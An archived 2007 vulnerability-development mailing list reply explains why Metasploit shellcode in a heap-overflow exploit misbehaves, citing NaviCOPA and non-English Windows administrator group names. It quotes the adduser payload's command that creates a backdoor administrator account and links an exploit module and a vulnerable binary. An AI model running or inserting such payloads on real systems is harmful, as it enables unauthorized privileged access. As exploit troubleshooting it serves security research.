Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Weird shellcode behavior

From: Jerome Athias <jerome.athias () free fr>
Date: Mon, 07 May 2007 08:06:19 +0200
Hi,

gljuposti () gmail com wrote :
I am building an exploit (heap OF) and I am experiencing different shellcode behavior depending on the parametar I can in no way associate with this problem. For one parametar value the shellcode gets executed correctly, but for the other, there are problems. For example, the calc.exe shellcode creates a calc.exe process (I can see it in task manager), but its window is never displayed. 
Exploiting NaviCOPA HTTP server provide a similar scenario.
Since there are 2 process running:
navicpt.exe (behind the shortcut on your desktop ;)
nacicpnt.exe (the targeted process)
Since in a real world you should not just to want to run calc on the target, i assume it's ok :-) 
Some other shellcodes like the add user shellcode don't work at all. I use shellcodes from Metasploit.

The shellcode gets called each time and it hasn't been changed in memory, it just doesn't behave like it should.
If you are sure that you correctly found the badchars, the reason could be that your target is not an english one. 
If you edit the shellcode's source code (single_adduser.asm), you will see:
db "cmd.exe /c net user metasploit x /ADD && net localgroup Administrators metasploit /ADD"
For an italian target, for example, you should have to replace "Administrators" with something like " Amministratori" 
Has anyone ever experienced something similar or has any idea why it could happen? This leaves me totaly confused.

TIA

References:
https://www.securinfos.info/jerome/navicopa_get_overflow.rb
(dev version)
https://www.securinfos.info/old_softwares_vulnerable/_navicpa_old.exe
(vuln version)
PS: i'm thinking to add a list of the name of the Administrators group in multiple languages in my MSF eXploit Builder tool to be able to modify it on the fly based on the locale chosen 
https://www.securinfos.info/metasploit/MSF_XB.php
So i invite people using a non-english Windows platform to send me the Administrators' group name with the corresponding locale (language). thanks in advance ;-) 

Hope it helps
/JA
Previous By Date Next
Previous By Thread Next

Current thread: